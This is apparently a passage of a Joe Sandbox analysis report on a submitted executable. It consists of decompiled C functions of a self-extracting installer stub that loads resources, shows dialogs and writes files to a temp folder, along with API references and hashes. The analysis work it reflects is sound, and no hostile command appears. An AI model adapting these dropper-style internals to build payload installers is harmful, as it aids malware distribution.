                                                                                                                                                                                                                                            0x00a429fc
                                                                                                                                                                                                                                            0x00a429ff
                                                                                                                                                                                                                                            0x00a42a02
                                                                                                                                                                                                                                            0x00a42a07
                                                                                                                                                                                                                                            0x00a42a0a
                                                                                                                                                                                                                                            0x00a42a0f
                                                                                                                                                                                                                                            0x00a42a19
                                                                                                                                                                                                                                            0x00a42a81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42a0f
                                                                                                                                                                                                                                            0x00a4298c
                                                                                                                                                                                                                                            0x00a42974
                                                                                                                                                                                                                                            0x00a42962
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4294f
                                                                                                                                                                                                                                            0x00a42912
                                                                                                                                                                                                                                            0x00a42a65
                                                                                                                                                                                                                                            0x00a42a68
                                                                                                                                                                                                                                            0x00a42a6c
                                                                                                                                                                                                                                            0x00a42a6f
                                                                                                                                                                                                                                            0x00a42a6f
                                                                                                                                                                                                                                            0x00a42a7d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00A42A6F
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: CharUpperA.USER32(173B1603,00000000,00000000,00000000), ref: 00A427A8
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: CharNextA.USER32(0000054D), ref: 00A427B5
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: CharNextA.USER32(00000000), ref: 00A427BC
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42829
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: RegQueryValueExA.ADVAPI32(?,00A41140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42852
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42870
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A428A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A43938,?,?,?,?,-00000005), ref: 00A42958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00A42969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A43938,?,?,?,?,-00000005,?), ref: 00A42A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A42A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: a9dda147aa515439744223395eda01fd8363cae2cceb4e4bc2823cb1a012e30b
                                                                                                                                                                                                                                            • Instruction ID: 63b4b55b34c97645daa2b4521ad6a5818a4b1574e975b1dcaccdd74daca32621
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9dda147aa515439744223395eda01fd8363cae2cceb4e4bc2823cb1a012e30b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2512939E00219DBDB25CF98C884AAEFBB5FF98740F54413AF945E3211DB319941DBA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E00A44169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E00A4468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E00A4468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E00A444B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a4417d
                                                                                                                                                                                                                                            0x00a4418f
                                                                                                                                                                                                                                            0x00a44193
                                                                                                                                                                                                                                            0x00a441b7
                                                                                                                                                                                                                                            0x00a441d3
                                                                                                                                                                                                                                            0x00a441e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a441e7
                                                                                                                                                                                                                                            0x00a441d5
                                                                                                                                                                                                                                            0x00a441d6
                                                                                                                                                                                                                                            0x00a441d8
                                                                                                                                                                                                                                            0x00a441d9
                                                                                                                                                                                                                                            0x00a441da
                                                                                                                                                                                                                                            0x00a441df
                                                                                                                                                                                                                                            0x00a441e1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a441e1
                                                                                                                                                                                                                                            0x00a441b9
                                                                                                                                                                                                                                            0x00a441ba
                                                                                                                                                                                                                                            0x00a441bc
                                                                                                                                                                                                                                            0x00a441bd
                                                                                                                                                                                                                                            0x00a441be
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a441be
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A430B4), ref: 00A44189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A430B4), ref: 00A441E7
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: fb653a5114b8129167ea09ffd6fff446567b801a89c27c4ceef9afd8832a30c3
                                                                                                                                                                                                                                            • Instruction ID: 663eae1f300586ceca9d549cb0e7faea078f537d4dcfccfa2a224de73fe3be08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb653a5114b8129167ea09ffd6fff446567b801a89c27c4ceef9afd8832a30c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F901FFBD3802247BF3242BA94C86F7B658EDBE9795F114229B706E21809AA9DC4241B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A419E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E00A443D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa49a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a419e0
                                                                                                                                                                                                                                            0x00a419e0
                                                                                                                                                                                                                                            0x00a419eb
                                                                                                                                                                                                                                            0x00a419f2
                                                                                                                                                                                                                                            0x00a419f9
                                                                                                                                                                                                                                            0x00a419fc
                                                                                                                                                                                                                                            0x00a41a01
                                                                                                                                                                                                                                            0x00a41a2a
                                                                                                                                                                                                                                            0x00a41a2e
                                                                                                                                                                                                                                            0x00a41a3e
                                                                                                                                                                                                                                            0x00a41a4f
                                                                                                                                                                                                                                            0x00a41a62
                                                                                                                                                                                                                                            0x00a41a6a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41a03
                                                                                                                                                                                                                                            0x00a41a06
                                                                                                                                                                                                                                            0x00a41a20
                                                                                                                                                                                                                                            0x00a41a20
                                                                                                                                                                                                                                            0x00a41a08
                                                                                                                                                                                                                                            0x00a41a08
                                                                                                                                                                                                                                            0x00a41a14
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41a16
                                                                                                                                                                                                                                            0x00a41a18
                                                                                                                                                                                                                                            0x00a41a70
                                                                                                                                                                                                                                            0x00a41a72
                                                                                                                                                                                                                                            0x00a41a72
                                                                                                                                                                                                                                            0x00a41a14
                                                                                                                                                                                                                                            0x00a41a06
                                                                                                                                                                                                                                            0x00a41a81

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A41A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A41A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00A41A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A41A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00A41A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: 286eee222e1204038522c0ce2b701d903b8dbd9530d39297e0f3e9da6ce42ddc
                                                                                                                                                                                                                                            • Instruction ID: 0942925c9b8101abf636a28c14bc9b8704dd377510cd5796c370344868ec1b1b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 286eee222e1204038522c0ce2b701d903b8dbd9530d39297e0f3e9da6ce42ddc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA11C83D5011099FDB10EFA8EE08AAE77B8EFDA340F104264F512D7191DB35AE52CB95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E00A463C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E00A41781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            				E00A4658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0xa49124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0xa49124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x00a463cb
                                                                                                                                                                                                                                            0x00a463d2
                                                                                                                                                                                                                                            0x00a463d8
                                                                                                                                                                                                                                            0x00a463ea
                                                                                                                                                                                                                                            0x00a463f3
                                                                                                                                                                                                                                            0x00a46401
                                                                                                                                                                                                                                            0x00a46402
                                                                                                                                                                                                                                            0x00a46410
                                                                                                                                                                                                                                            0x00a46415
                                                                                                                                                                                                                                            0x00a46433
                                                                                                                                                                                                                                            0x00a46438
                                                                                                                                                                                                                                            0x00a46449
                                                                                                                                                                                                                                            0x00a46463
                                                                                                                                                                                                                                            0x00a4646d
                                                                                                                                                                                                                                            0x00a46477
                                                                                                                                                                                                                                            0x00a46477
                                                                                                                                                                                                                                            0x00a4647a
                                                                                                                                                                                                                                            0x00a4643a
                                                                                                                                                                                                                                            0x00a4643a
                                                                                                                                                                                                                                            0x00a46444
                                                                                                                                                                                                                                            0x00a46444
                                                                                                                                                                                                                                            0x00a46492

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A4642D
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A4645B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A4647A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A463EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 1065093856-2312194364
                                                                                                                                                                                                                                            • Opcode ID: cb1a1518b3b6119349608512b2819ded5ab726044a139efdd33db81c80e4228f
                                                                                                                                                                                                                                            • Instruction ID: 6597690b3d41afff4e1a790cf2d2f7c91b72e67667e0843c617f27c6fd6c263f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb1a1518b3b6119349608512b2819ded5ab726044a139efdd33db81c80e4228f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D210579A00218ABCB10DF65DC85FEB7378EBC6310F000269F585A3180CBB05D858F61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A447E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                            				void _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                            					_t22 = _t33;
                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t6 =  *_t22;
                                                                                                                                                                                                                                            						_t22 = _t22 + 1;
                                                                                                                                                                                                                                            					} while (_t6 != 0);
                                                                                                                                                                                                                                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                            					 *_t34 = _t24;
                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                            						_t28 = _t33;
                                                                                                                                                                                                                                            						_t19 = _t28 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t9 =  *_t28;
                                                                                                                                                                                                                                            							_t28 = _t28 + 1;
                                                                                                                                                                                                                                            						} while (_t9 != 0);
                                                                                                                                                                                                                                            						E00A41680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                            						_t11 =  *0xa491e0; // 0x2ec8390
                                                                                                                                                                                                                                            						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                            						 *0xa491e0 = _t34;
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t25 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            					E00A444B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					LocalFree(_t34);
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            				E00A444B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x00a447e8
                                                                                                                                                                                                                                            0x00a447f0
                                                                                                                                                                                                                                            0x00a447f4
                                                                                                                                                                                                                                            0x00a4480f
                                                                                                                                                                                                                                            0x00a44811
                                                                                                                                                                                                                                            0x00a44814
                                                                                                                                                                                                                                            0x00a44814
                                                                                                                                                                                                                                            0x00a44816
                                                                                                                                                                                                                                            0x00a44817
                                                                                                                                                                                                                                            0x00a44829
                                                                                                                                                                                                                                            0x00a4482b
                                                                                                                                                                                                                                            0x00a4482f
                                                                                                                                                                                                                                            0x00a4484f
                                                                                                                                                                                                                                            0x00a44852
                                                                                                                                                                                                                                            0x00a44855
                                                                                                                                                                                                                                            0x00a44855
                                                                                                                                                                                                                                            0x00a44857
                                                                                                                                                                                                                                            0x00a44858
                                                                                                                                                                                                                                            0x00a44860
                                                                                                                                                                                                                                            0x00a44865
                                                                                                                                                                                                                                            0x00a4486a
                                                                                                                                                                                                                                            0x00a4486f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44876
                                                                                                                                                                                                                                            0x00a44831
                                                                                                                                                                                                                                            0x00a44841
                                                                                                                                                                                                                                            0x00a44847
                                                                                                                                                                                                                                            0x00a4480b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4480b
                                                                                                                                                                                                                                            0x00a447f6
                                                                                                                                                                                                                                            0x00a44806
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A44E6F), ref: 00A447EA
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00A44823
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A44847
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A44851
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 359063898-2312194364
                                                                                                                                                                                                                                            • Opcode ID: 81ddfc6ad3934d8d52ceb97ab1c9f8e99d6d76915c1f65b1e82e097611bd0463
                                                                                                                                                                                                                                            • Instruction ID: 330e0b080b4e795891aeb48ecf3d7712ca7bab366f527540904c68bede45c73b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81ddfc6ad3934d8d52ceb97ab1c9f8e99d6d76915c1f65b1e82e097611bd0463
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A11E57D6046416FEB54DFB8AC18F773B6AEBCA300F148519FA829B741DA369C078760
                                                                                                                                                                                                                                            Uniqueness

